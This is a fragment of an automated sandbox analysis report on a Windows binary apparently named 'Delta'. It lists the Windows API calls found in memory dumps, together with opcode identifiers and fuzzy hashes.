                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: bef3c5899bd8e07124d85758f90449be11435563a88b40353669e6b4ed24fd6d
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: 9E023EB1E012199BEF14DFA9C8806AEFBF1FF88314F148169E615E7341D735AA45CB90
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005FB889
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: 0d2fa2a8674212543f1a26b6b45c70fbdbd5ce5d3ebed7df8d23616e3569fe4a
                                                                                          • Instruction ID: 50f8e18100d24ebb4c1641b2643babded59c4f79ca46b1c93c3e51118628d183
                                                                                          • Opcode Fuzzy Hash: 0d2fa2a8674212543f1a26b6b45c70fbdbd5ce5d3ebed7df8d23616e3569fe4a
                                                                                          • Instruction Fuzzy Hash: F071CF7190516DAEEF20AF24CC8DABABFB9FF45340F1441D9E649A3211EB394E808F10
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005E9A7F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 005E9B4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005E9B64
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 005E9B6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 8410012e338653ff480b5c143c23528b52161ea02fffc7f4f701281633e30b17
                                                                                          • Instruction ID: ba2e2a1a2cbdd80e666ab0f858572942a8b953fde58e5e83c3e6a2b398634988
                                                                                          • Opcode Fuzzy Hash: 8410012e338653ff480b5c143c23528b52161ea02fffc7f4f701281633e30b17
                                                                                          • Instruction Fuzzy Hash: C431F9B5D053299BDF21DFA5D9497CDBBB8BF48300F1041EAE40CAB250E7719A858F45
                                                                                          APIs
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005EA347
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EA356
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005EA35F
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 005EA36C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: ab4b80f9ea997276fba6bd27f9e320b6c5a292dca00680a2f25a7cfff5cb03d1
                                                                                          • Instruction ID: e01ec535383a987fcefdec46577761adc27fad4cef760f2cb99872c5bf719e08
                                                                                          • Opcode Fuzzy Hash: ab4b80f9ea997276fba6bd27f9e320b6c5a292dca00680a2f25a7cfff5cb03d1
                                                                                          • Instruction Fuzzy Hash: 22F0B234C4021CEBCB00EBB4CA8999FBBF4FF1C200B9199A6A412E7110E730AB448F51
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FAD84
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FADCE
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FAE94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 661929714-0
                                                                                          • Opcode ID: 700886d269e3de67147940666f3f71da36e61deb13b519a0d3b27d3d48e19feb
                                                                                          • Instruction ID: 8165e2b495ac0b0ad5db45b72a223728b4c94de0b4253f3d8f47350013202dc9
                                                                                          • Opcode Fuzzy Hash: 700886d269e3de67147940666f3f71da36e61deb13b519a0d3b27d3d48e19feb
                                                                                          • Instruction Fuzzy Hash: BF6194B595020B9FEB289F24CC86BBA7BA8FF44310F144579EB09C6285E778D950CB52
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005F1B58
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005F1B62
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005F1B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 8517d193871604491c9151a738cfa2953d3cb0fb2c666a18a4b64b8c3bdb64c8
                                                                                          • Instruction ID: 6b5d4b209c7d9fec6aefcef15ec4e48b745e73470215890efd325a7ac3dffa94
                                                                                          • Opcode Fuzzy Hash: 8517d193871604491c9151a738cfa2953d3cb0fb2c666a18a4b64b8c3bdb64c8
                                                                                          • Instruction Fuzzy Hash: A531D2B494132D9BCB21DF69D888BDDBBB8BF48310F5041EAE41CA7250EB749B858F44
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005FE9E9,?,?,00000008,?,?,0060539B,00000000), ref: 005FECBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 66c1c8d2e324bde691064f8c73d28a2e331cac10f3dd1608a3a9263335118690
                                                                                          • Instruction ID: 59457fe16efe39c1507bfe54af74336cfb2c25983c144370b3d32e6c51f625d3
                                                                                          • Opcode Fuzzy Hash: 66c1c8d2e324bde691064f8c73d28a2e331cac10f3dd1608a3a9263335118690
                                                                                          • Instruction Fuzzy Hash: 04B1F9316106099FD715CF28C48AB657FE1FF45364F298A58EA9ACF2B1C339E991CB40
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005E96F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: b3738988c0132764c166754745527ec5c89838695ed0e40faf49afde22c16267
                                                                                          • Instruction ID: 824074eff3801c20d835cd8477cf328fb17a756cf97217a24ef8052539a0e12c
                                                                                          • Opcode Fuzzy Hash: b3738988c0132764c166754745527ec5c89838695ed0e40faf49afde22c16267
                                                                                          • Instruction Fuzzy Hash: E7A19DB19152498FEF58CF59D8912A9BBF2FF48310F18E52AD465EB260C3B49980CF90
                                                                                          APIs
                                                                                            • Part of subcall function 005F69F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,005F5B8F,00000001,00000364,00000002,000000FF,?,00000000,?,005ED655,00000000,?), ref: 005F6A35
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005FB889
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 005FB97D
                                                                                          • FindClose.KERNEL32(00000000), ref: 005FB9BC
                                                                                          • FindClose.KERNEL32(00000000), ref: 005FB9EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                          • String ID:
                                                                                          • API String ID: 2701053895-0
                                                                                          • Opcode ID: 860c20129ae9f77e1f0437f43bbe883d7119e1af4ddc0edcc85eae6d38555766
                                                                                          • Instruction ID: b8cc0dba2fb4bb478e3a0ecf0139779bcb0b27a71293b76e9fef43a5dc28297c
                                                                                          • Opcode Fuzzy Hash: 860c20129ae9f77e1f0437f43bbe883d7119e1af4ddc0edcc85eae6d38555766
                                                                                          • Instruction Fuzzy Hash: 8F51337590110DEEEF24AF38CC89ABE7FA9EFC5344F144199FA1997201EB389D419B60
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FB044
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 1428d49eb3019211cdb27516ca743be14626b16e163142408e508824acec42ae
                                                                                          • Instruction ID: 0ee037149a97d9bb008695a5818ac7fa4923b932b9b92b9b67659e2717ce488c
                                                                                          • Opcode Fuzzy Hash: 1428d49eb3019211cdb27516ca743be14626b16e163142408e508824acec42ae
                                                                                          • Instruction Fuzzy Hash: 7721837265120BEBEB289B25DD49ABB7BACFF44310B10407AFB11C6181EF789D41CB50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 0422a51fa2525f5600fb712295ed5d43f581595df28f560164dd6508add14ee0
                                                                                          • Instruction ID: 7b7ce7243df9bce5084a4af690ba017fc595558bdd72d5079c85117adeff131a
                                                                                          • Opcode Fuzzy Hash: 0422a51fa2525f5600fb712295ed5d43f581595df28f560164dd6508add14ee0
                                                                                          • Instruction Fuzzy Hash: 15B1C37090068B8BCB3CCF6A895A6BEBFB5BF55300F140619D9E39B681D7319D42CB61
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 005FB164
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: b990b817b88dea725def9db649314ce0c6cb76a41a9d2ff67cefa2134029c282
                                                                                          • Instruction ID: af0a765316d1e1cc378ecf3e19851846248849dd7d00bae86970b579a1535372
                                                                                          • Opcode Fuzzy Hash: b990b817b88dea725def9db649314ce0c6cb76a41a9d2ff67cefa2134029c282
                                                                                          • Instruction Fuzzy Hash: 5A11A77265020BDBE718AB28DC56DBA7BADFF45310B14416AE605D7141EB78ED01C750
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • EnumSystemLocalesW.KERNEL32(005FAD30,00000001,00000000,?,-00000050,?,005FAB13,00000000,-00000002,00000000,?,00000055,?), ref: 005FACFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 0dee9fb092a1e17dfd362ab4b495cac0f0f6591fdf58bbb059cd7446f891b064
                                                                                          • Instruction ID: ccb11cc0bbe516d24c8b58129b9843ec7cc7e487a984f67d6a9143e3fb14dc0d
                                                                                          • Opcode Fuzzy Hash: 0dee9fb092a1e17dfd362ab4b495cac0f0f6591fdf58bbb059cd7446f891b064
                                                                                          • Instruction Fuzzy Hash: EB11E9772007059FDB189F39C89167ABB92FF80769B19842CEA4B87B40D775BD42C741
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005FAF4C,00000000,00000000,?), ref: 005FB2E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: ac68868688e2aec1f3983cb74a8b0aa0285d3a33f6bde964bfa3067ea5f99750
                                                                                          • Instruction ID: f4a1caabd42cadb225af9820ea44fae4faf80871eddef85b72cc6f4a7e52c9ce
                                                                                          • Opcode Fuzzy Hash: ac68868688e2aec1f3983cb74a8b0aa0285d3a33f6bde964bfa3067ea5f99750
                                                                                          • Instruction Fuzzy Hash: 1201DB36A5011AEBEF185A24CC066BA7B54FB40354F554C28EE06A31C0EB78FE41C590
                                                                                          APIs
                                                                                            • Part of subcall function 005F594A: GetLastError.KERNEL32(00000000,?,005F7CCD), ref: 005F594E
                                                                                            • Part of subcall function 005F594A: SetLastError.KERNEL32(00000000,?,?,00000028,005F1F93), ref: 005F59F0
                                                                                          • EnumSystemLocalesW.KERNEL32(005FAFF0,00000001,?,?,-00000050,?,005FAADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 005FAFCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: a601a63daa5be678f47b4bdd8e17a52e763054be75b8cf1e3a68ad5c45e8a28d
                                                                                          • Instruction ID: cd472abd56af9e6dca79df4898ba8ad18831634983a0b43df5ad19f0678f7d98
                                                                                          • Opcode Fuzzy Hash: a601a63daa5be678f47b4bdd8e17a52e763054be75b8cf1e3a68ad5c45e8a28d
                                                                                          • Instruction Fuzzy Hash: 03F0F6BA2003085FDB256F39DC85A7A7F91FF80368B15852CFB4A4B680D6B99C42C652
                                                                                          APIs
                                                                                            • Part of subcall function 005F1D11: EnterCriticalSection.KERNEL32(?,?,005F5DD8,?,0060FC38,00000008,005F5CCA,00000000,00000000,?), ref: 005F1D20
                                                                                          • EnumSystemLocalesW.KERNEL32(005F68F0,00000001,0060FCB8,0000000C,005F62F1,-00000050), ref: 005F6935
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
